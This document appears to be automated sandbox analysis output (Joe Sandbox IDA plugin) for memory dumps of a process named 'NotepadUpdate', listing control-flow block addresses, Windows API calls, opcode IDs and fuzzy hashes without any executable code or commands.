                                  execution_graph 30038 62c43de 30039 62c43f2 30038->30039 30041 62c43f9 30038->30041 30040 62c444a CallWindowProcW 30039->30040 30039->30041 30040->30041 29998 147d580 29999 147d585 GetCurrentProcess 29998->29999 30001 147d611 29999->30001 30002 147d618 GetCurrentThread 29999->30002 30001->30002 30003 147d655 GetCurrentProcess 30002->30003 30004 147d64e 30002->30004 30005 147d68b 30003->30005 30004->30003 30006 147d6b3 GetCurrentThreadId 30005->30006 30007 147d6e4 30006->30007 30042 62c1df0 30043 62c1e58 CreateWindowExW 30042->30043 30045 62c1f14 30043->30045 30008 147d7c8 30009 147d7cd DuplicateHandle 30008->30009 30010 147d85e 30009->30010 30011 1474668 30012 147467a 30011->30012 30016 1474778 30012->30016 30021 14746b8 30012->30021 30013 1474686 30017 147477c 30016->30017 30026 1474878 30017->30026 30030 1474888 30017->30030 30022 14746bc 30021->30022 30024 1474878 CreateActCtxA 30022->30024 30025 1474888 CreateActCtxA 30022->30025 30023 14747a7 30023->30013 30024->30023 30025->30023 30027 1474880 30026->30027 30028 147498c 30027->30028 30034 14744b4 30027->30034 30031 1474889 30030->30031 30032 147498c 30031->30032 30033 14744b4 CreateActCtxA 30031->30033 30032->30032 30033->30032 30035 1475918 CreateActCtxA 30034->30035 30037 14759db 30035->30037 30046 147b218 30047 147b227 30046->30047 30049 147b300 30046->30049 30051 147b304 30049->30051 30050 147b2b5 30050->30047 30051->30050 30052 147b548 GetModuleHandleW 30051->30052 30053 147b575 30052->30053 30053->30047
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (oq$(oq$,q$,q$Hq
                                  • API String ID: 0-962059274
                                  • Opcode ID: 2a4f0d9b2e8bae6dcb28becf75c51a513b6782139f4bc48348a2c5110da7b4d2
                                  • Instruction ID: cc1a80822df6ab687dee847dfc75e4ce282a291792f3de6844156204187969ec
                                  • Opcode Fuzzy Hash: 2a4f0d9b2e8bae6dcb28becf75c51a513b6782139f4bc48348a2c5110da7b4d2
                                  • Instruction Fuzzy Hash: 78527035B11215DFDB14DF69D984AADBBB2BF88314B198069F806DB3A0DB31EC41CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1502 92d1240-92d1271 1503 92d1278-92d133d 1502->1503 1504 92d1273 1502->1504 1510 92d138b-92d139c 1503->1510 1504->1503 1511 92d133f-92d1377 1510->1511 1512 92d139e-92d1406 1510->1512 1515 92d137e-92d1388 1511->1515 1516 92d1379 1511->1516 1520 92d1c60-92d1c8b 1512->1520 1515->1510 1516->1515 1522 92d1c8d-92d1cb6 1520->1522 1523 92d1cb8-92d1cba 1520->1523 1524 92d1cc0-92d1cd4 1522->1524 1523->1524 1526 92d140b-92d1412 1524->1526 1527 92d1cda-92d1ce1 1524->1527 1528 92d1464-92d149f 1526->1528 1530 92d14a5-92d14ae 1528->1530 1531 92d1414-92d142a 1528->1531 1532 92d14b1-92d14e5 1530->1532 1533 92d142c 1531->1533 1534 92d1431-92d144f 1531->1534 1538 92d1504-92d152b 1532->1538 1539 92d14e7-92d1501 1532->1539 1533->1534 1535 92d1456-92d1461 1534->1535 1536 92d1451 1534->1536 1535->1528 1536->1535 1542 92d152d-92d1556 1538->1542 1543 92d1558 1538->1543 1539->1538 1544 92d1562-92d1570 1542->1544 1543->1544 1546 92d1576-92d157d 1544->1546 1547 92d1660-92d170d 1544->1547 1548 92d1643-92d1654 1546->1548 1571 92d170f 1547->1571 1572 92d1713-92d1715 1547->1572 1549 92d165a-92d165b 1548->1549 1550 92d1582-92d1598 1548->1550 1554 92d1c07-92d1c42 1549->1554 1552 92d159f-92d15fd 1550->1552 1553 92d159a 1550->1553 1564 92d15ff 1552->1564 1565 92d1604-92d1629 1552->1565 1553->1552 1554->1532 1559 92d1c48-92d1c5f 1554->1559 1559->1520 1564->1565 1569 92d163f-92d1640 1565->1569 1570 92d162b-92d1637 1565->1570 1569->1548 1570->1569 1573 92d1717 1571->1573 1574 92d1711 1571->1574 1575 92d171c-92d1723 1572->1575 1573->1575 1574->1572 1576 92d1725-92d172e 1575->1576 1577 92d1731-92d1762 1575->1577 1576->1577 1579 92d17b5-92d17f0 1577->1579 1581 92d1764-92d1779 1579->1581 1582 92d17f6-92d1809 1579->1582 1583 92d177b 1581->1583 1584 92d1780-92d179e 1581->1584 1588 92d180b-92d19b2 1582->1588 1589 92d1811-92d1831 1582->1589 1583->1584 1586 92d17a5-92d17b2 1584->1586 1587 92d17a0 1584->1587 1586->1579 1587->1586 1591 92d19ba-92d1a59 1588->1591 1592 92d19b4-92d19b5 1588->1592 1595 92d183a-92d18fd 1589->1595 1613 92d1a5b 1591->1613 1614 92d1a60-92d1a92 1591->1614 1594 92d1bc2-92d1bef 1592->1594 1600 92d1c06 1594->1600 1601 92d1bf1-92d1c05 1594->1601 1611 92d18ff 1595->1611 1612 92d1904-92d1917 1595->1612 1600->1554 1601->1600 1611->1612 1615 92d191e-92d192b 1612->1615 1616 92d1919 1612->1616 1613->1614 1620 92d1a99-92d1acb 1614->1620 1621 92d1a94 1614->1621 1618 92d192d 1615->1618 1619 92d1932-92d1956 1615->1619 1616->1615 1618->1619 1624 92d195d-92d1977 1619->1624 1625 92d1958 1619->1625 1626 92d1acd 1620->1626 1627 92d1ad2-92d1b2f 1620->1627 1621->1620 1628 92d1979-92d1998 1624->1628 1629 92d19a2-92d19a3 1624->1629 1625->1624 1626->1627 1634 92d1b81-92d1ba3 1627->1634 1635 92d1b31-92d1b7b 1627->1635 1630 92d199f 1628->1630 1631 92d199a 1628->1631 1629->1594 1630->1629 1631->1630 1639 92d1bad-92d1bc0 1634->1639 1635->1634 1639->1594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: 79cab103032ef214213de6971ef685ccf48b20e16fd797d50796e63018f22745
                                  • Instruction ID: a58280d44017599b73aa435a3230016e3f0775bdec5650bf4f3a4bbaf7cbe414
                                  • Opcode Fuzzy Hash: 79cab103032ef214213de6971ef685ccf48b20e16fd797d50796e63018f22745
                                  • Instruction Fuzzy Hash: ED62DE74E05229CFDB28DF69C984BDEBBB2BB49301F1081E9D449AB255DB309E85CF50

                                  Control-flow Graph
                                  • Graph: basic blocks 92d619d-92d6ba6 (entry 92d61dd); no API calls in this function. Rendered control-flow graph not reproduced in text.
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D
                                  • API String ID: 0-2746444292
                                  • Opcode ID: 1cd567521b9bbf5cd2df81360722d5fbfa6da286ad53d3d79eb5f538ef410409
                                  • Instruction ID: dea434f5dffebb509eb0188a4486befe7145af79cf0d3c5fd766f9b29aaab9f8
                                  • Opcode Fuzzy Hash: 1cd567521b9bbf5cd2df81360722d5fbfa6da286ad53d3d79eb5f538ef410409
                                  • Instruction Fuzzy Hash: D652EB74A012198FDB64DF64D998B9DB7B2FF89310F1441DAD50AAB364CB30AE81CF90

                                  Control-flow Graph
                                  • Graph: basic blocks 147d570-147d74d; calls GetCurrentProcess (block 147d585-147d60f), GetCurrentThread (147d618-147d64c), GetCurrentProcess (147d655-147d689), call 147d75b (147d692-147d6ad), GetCurrentThreadId (147d6b3-147d6e2). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0147D5FE
                                  • GetCurrentThread.KERNEL32 ref: 0147D63B
                                  • GetCurrentProcess.KERNEL32 ref: 0147D678
                                  • GetCurrentThreadId.KERNEL32 ref: 0147D6D1
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 4b43718f957bdda153d8e7e91e7b562607fc1b0b8eafaf9f0226b037d8e729db
                                  • Instruction ID: c3d862bee50390513ffb58b5593c874dca8e6dc789a6d3846175c75029f28760
                                  • Opcode Fuzzy Hash: 4b43718f957bdda153d8e7e91e7b562607fc1b0b8eafaf9f0226b037d8e729db
                                  • Instruction Fuzzy Hash: 2F5147B0D013498FEB18CFA9D5487EEBBF1EF88314F24845AE019AB3A1D7345944CB66

                                  Control-flow Graph
                                  • Graph: basic blocks 147d580-147d74d; calls GetCurrentProcess (block 147d580-147d60f), GetCurrentThread (147d618-147d64c), GetCurrentProcess (147d655-147d689), call 147d75b (147d692-147d6ad), GetCurrentThreadId (147d6b3-147d6e2). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0147D5FE
                                  • GetCurrentThread.KERNEL32 ref: 0147D63B
                                  • GetCurrentProcess.KERNEL32 ref: 0147D678
                                  • GetCurrentThreadId.KERNEL32 ref: 0147D6D1
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 9c995beae074bba1fe8da95a9c1f52ad8b1fcf954b2cdd3bb25b0d2316e92837
                                  • Instruction ID: 2efafc91875b5ebda42431b4393721bea70eb6f0751f9c8cdb5fe43d640c2692
                                  • Opcode Fuzzy Hash: 9c995beae074bba1fe8da95a9c1f52ad8b1fcf954b2cdd3bb25b0d2316e92837
                                  • Instruction Fuzzy Hash: 1F5136B1D00249CFEB18CFAAD548BDEBBF1EF88314F20855AE019A7361D7745944CB66

                                  Control-flow Graph
                                  • Graph: basic blocks 147b2b5-147b590 (entry 147b300); calls 147acc4 (block 147b321-147b32e), a call at 147b336 resolved to 147b5fc/147b598/147b5a8, 147acd0 (147b3c8-147b3cf), 147ace0 (147b410-147b419), 147acf0 and 147ad00 (147b436-147b446), a call at 147b450 resolved to 147b879/147b888, GetModuleHandleW (147b548-147b573). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B566
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 49ed00cc5e2accdab32767dc879a0a6ab67f0cff1fc56fbcfc564315f4fadb86
                                  • Instruction ID: 6f1a6980c459910df29248eb726b3b64875707e5bfc5a52cbcf18bd351b1af4e
                                  • Opcode Fuzzy Hash: 49ed00cc5e2accdab32767dc879a0a6ab67f0cff1fc56fbcfc564315f4fadb86
                                  • Instruction Fuzzy Hash: 63916470A00B418FE725CF2AD45479BBBF1FF88214F04892ED586CBA61D735E84ACB91

                                  Control-flow Graph
                                  • Graph: basic blocks 62c1de4-62c1f61; calls CreateWindowExW (block 62c1eb3-62c1f12). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 062C1F02
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1587085222.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_62c0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 0d90570e3ba1158b5964ca7680233e7296e9e73c4ec8160d8c3c9c17acdce71f
                                  • Instruction ID: 30f126438e498b3f7d615b30090c9520258ef5d43977644a16581a4e0d18725d
                                  • Opcode Fuzzy Hash: 0d90570e3ba1158b5964ca7680233e7296e9e73c4ec8160d8c3c9c17acdce71f
                                  • Instruction Fuzzy Hash: 2451E0B1C10349DFDB14CF9AC885ADEBBB5BF48310F24822EE818AB251D7749941CF90

                                  Control-flow Graph
                                  • Graph: basic blocks 62c1df0-62c1f61; calls CreateWindowExW (block 62c1e73-62c1f12). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 062C1F02
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1587085222.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_62c0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 5b165cd1c8ab717daf5c2b324aed5bc6e9af4384ade2677df2aac3c0c7168fb5
                                  • Instruction ID: 9772003a61078977aaec4b273cab89f11f06600e29a62a20447bbb0015515ce9
                                  • Opcode Fuzzy Hash: 5b165cd1c8ab717daf5c2b324aed5bc6e9af4384ade2677df2aac3c0c7168fb5
                                  • Instruction Fuzzy Hash: F941AEB1D10349DFDB14CF9AC885ADEBBB5BF48310F24822EE818AB251D7759945CF90

                                  Control-flow Graph
                                  • Graph: basic blocks 147590c-1475a61; calls CreateActCtxA (block 1475919-14759d9). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: ed96e9e7a9a8c4035fc8641167fbad2522c38e9797dc6f366b9c464052ca936d
                                  • Instruction ID: b344cbb381df4a3e65e78f024b4bff43dc911504a03a88dc3116f6dc9c3b619e
                                  • Opcode Fuzzy Hash: ed96e9e7a9a8c4035fc8641167fbad2522c38e9797dc6f366b9c464052ca936d
                                  • Instruction Fuzzy Hash: BC41E0B1C00719DFEB28DFAAC8847DEBBB5BF49304F20806AD408AB261DB755946CF54

                                  Control-flow Graph
                                  • Graph: basic blocks 14744b4-1475a61; calls CreateActCtxA (block 14744b4-14759d9). Rendered control-flow graph not reproduced in text.
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c300aca774cfcf7fd1f5fadf0101d58d9beb3fe0f4d3c0d78dbf39ee7ac4cab5
                                  • Instruction ID: a0b655e854951bb91aebee7afa82d32910e907f2cdea2521c83d9fe914ef8949
                                  • Opcode Fuzzy Hash: c300aca774cfcf7fd1f5fadf0101d58d9beb3fe0f4d3c0d78dbf39ee7ac4cab5
                                  • Instruction Fuzzy Hash: 2741A2B1D00719DFEB24DFAAC8847DEBBB5BF49304F20806AD418AB251D7756946CF90
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 062C4471
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1587085222.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_62c0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: d4e35e3c702ec11afb88bb20212e0b9fa09f016d9b66f69f80d36de3e65ff641
                                  • Instruction ID: 2c312446581c75af07f1640fb0fb3ceb3f1db6c91049681679f8cc63fc396ff6
                                  • Opcode Fuzzy Hash: d4e35e3c702ec11afb88bb20212e0b9fa09f016d9b66f69f80d36de3e65ff641
                                  • Instruction Fuzzy Hash: 8E3129B5A10205CFDB64DF95C448AAAFBF5FF88324F24C55DD919AB321D374A841CB90
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D84F
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 77b99032f7299a1a7a4775fd0f4628b14eca5218693ae3c9367ccc3743239841
                                  • Instruction ID: 8dac9b07b5a2f882908a6940f1cf6b14b825e1e5bca1be804e188772c9fcd190
                                  • Opcode Fuzzy Hash: 77b99032f7299a1a7a4775fd0f4628b14eca5218693ae3c9367ccc3743239841
                                  • Instruction Fuzzy Hash: 5221D6B5D10248AFDB10CF9AD584ADEBFF9EF48310F14841AE918A7350D375A944CF65
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D84F
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a57e03acf5802091af6df7f7060c4217c570bd16a7b442bb0d9fd48c36a4f06a
                                  • Instruction ID: 59ca9834e0fe8a3cb38d35766e4577cfa6d4df044421445de69bf24373ad84ee
                                  • Opcode Fuzzy Hash: a57e03acf5802091af6df7f7060c4217c570bd16a7b442bb0d9fd48c36a4f06a
                                  • Instruction Fuzzy Hash: F521C4B5D00248DFDB10CF9AD984ADEBBF5FB48310F14841AE928A7350D379A944CFA5
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B566
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: ddd8ef4ee2bd3ce346dda0142ca6f63e791ef57b6507992723882d6066c6a2cb
                                  • Instruction ID: 1e80af8067805f4579fa4d7534749238216525aca3dc3ddb21549b74680134c9
                                  • Opcode Fuzzy Hash: ddd8ef4ee2bd3ce346dda0142ca6f63e791ef57b6507992723882d6066c6a2cb
                                  • Instruction Fuzzy Hash: 0511DFB6C00649CFDB24DF9AC444BDEFBF4EB88324F10841AD929A7610C379A545CFA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d8q
                                  • API String ID: 0-2239850164
                                  • Opcode ID: b28633b4414895147e034f365788521c52efa443a4a191ada8802f8608b19aa9
                                  • Instruction ID: ded51431975a4865a8857ae170edb53fda1ef23a0fed1d9e936b38a916c88ce7
                                  • Opcode Fuzzy Hash: b28633b4414895147e034f365788521c52efa443a4a191ada8802f8608b19aa9
                                  • Instruction Fuzzy Hash: 5761AD35B1120A9FCF14CF68D955A9EBBF2EF88715F14406AE902AB354DB70DC41CBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hq
                                  • API String ID: 0-1594803414
                                  • Opcode ID: bf7868d1fb65ec4ff8d975f62c5e43595d365d4d91b9031b4f6aca6269a1174a
                                  • Instruction ID: 03be26db8e9b6956a0ea924ff3a502dd52f153030527aceb30829c4067463422
                                  • Opcode Fuzzy Hash: bf7868d1fb65ec4ff8d975f62c5e43595d365d4d91b9031b4f6aca6269a1174a
                                  • Instruction Fuzzy Hash: D7312230A09340AFE7469F749C16BAA7FB6EFC6300F1480ABE586CF295DA344D05C791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hq
                                  • API String ID: 0-1594803414
                                  • Opcode ID: 54a5e1f07b16c44e277e8a0fccc390816fcff980ddfd9e0bebc16f5b148f15b5
                                  • Instruction ID: 406ad21e890cb7aaaade8ac24c7f2994549357cba6385bd3669a26ea8b4cfc0d
                                  • Opcode Fuzzy Hash: 54a5e1f07b16c44e277e8a0fccc390816fcff980ddfd9e0bebc16f5b148f15b5
                                  • Instruction Fuzzy Hash: BD213030A05204AFE7029FB49C26BAE7FB7EBC6300F14C0A7E586DB284DA348D05C791
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a1b00182108d1e7703e5519edf8f3329681573898d031a2652842428a7c3dc9
                                  • Instruction ID: 0c4662db403d37db892e8a6b2a0af243c1b66a322a108b7f290d9d83684e00dc
                                  • Opcode Fuzzy Hash: 4a1b00182108d1e7703e5519edf8f3329681573898d031a2652842428a7c3dc9
                                  • Instruction Fuzzy Hash: BB622470D56B428ADB749FB4C6983BD7AA1AB41304F704A1FE1FACB360DB349486CB45
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d2f4417cab24c13408451c6fbf5bea10b863f3232cdaf9b33b0e94644dcc086
                                  • Instruction ID: e8ee75434fa27d02d7add5db54d63d81fa382a68f042ff3424dcc7b5878f5075
                                  • Opcode Fuzzy Hash: 9d2f4417cab24c13408451c6fbf5bea10b863f3232cdaf9b33b0e94644dcc086
                                  • Instruction Fuzzy Hash: DC415C71A0121A9FDB05DF65D844AAEB7A3FBC8314F18802AF9029B294DB309D56CBD1
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 259fd3c29de470a7f56cd7b880c39e419acbdc3807bca35c8f8f2e126c05b5aa
                                  • Instruction ID: 32c8945963db853982270aca58f84894ad49847d0aa9853a4b34dde911f5e63f
                                  • Opcode Fuzzy Hash: 259fd3c29de470a7f56cd7b880c39e419acbdc3807bca35c8f8f2e126c05b5aa
                                  • Instruction Fuzzy Hash: 50219A35A152068FCB11DFB8C584A5ABBB1AF49314B1540AAE905CB361D735DC84CBA2
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 274f87790c804f563716e754741a972fe873d189d19d128b3913b47e79796be0
                                  • Instruction ID: 11778ee457389c79ba3b5d64a37b2acf641481605eb5641a534c3764699e0b04
                                  • Opcode Fuzzy Hash: 274f87790c804f563716e754741a972fe873d189d19d128b3913b47e79796be0
                                  • Instruction Fuzzy Hash: 7421C571904304EFDB15DF94D9C0B26BB65FB85324F64C56EE9094B3A2C336D886CA72
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bef7b8206c0d4925e30c55c0a26da3d632a95829f730ab2c86ebca1d8b431082
                                  • Instruction ID: 01c0ec06f1392a1d8b71fe81d7c03b2aee24e480f353d08a2e001934252f5a59
                                  • Opcode Fuzzy Hash: bef7b8206c0d4925e30c55c0a26da3d632a95829f730ab2c86ebca1d8b431082
                                  • Instruction Fuzzy Hash: C0210071904200EFDB15DFA4D5C4B26BB61EB88318F60C56EE8094B3A2C336D887CA62
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 755ac39d0119e7ebb050ed8bfdb78333ae857e5efd2b5871d0d18c2fa056c611
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: 8311AC75904240DFDB06CF54D584B16BB61FB84218F24C6AAD8494B7A7C33AE44ACB52
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 2c0c46c5ee558b32a4828f7f82478cd848af8c4f222ae678f82a6b2e2d68222a
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: 9C11BE75904240DFDB06CF54D5C0B16BF61FB85324F24C6AAD8494B7A6C33AD44ACBA1
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 754dd427bc5186ad63de137c263518140c03cd461d830013786f34aa0ad18aee
                                  • Instruction ID: 056ec9e7d85ef359c3eab6bf0b9597173dbaef5c1a3968dcea2b5ce9601537bf
                                  • Opcode Fuzzy Hash: 754dd427bc5186ad63de137c263518140c03cd461d830013786f34aa0ad18aee
                                  • Instruction Fuzzy Hash: ACF0E53111B384AFCF129BB1EC089977F69EB46354F044076F904C7012E7768118C6B2
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 791fd924caf23536b3884d70a11eb44991d6058064c11241f57aa2af14c465f8
                                  • Instruction ID: 1c9d0ac5d489356c3ecebc3cc7724a827fb5ec0a132591a13506ea984586fc53
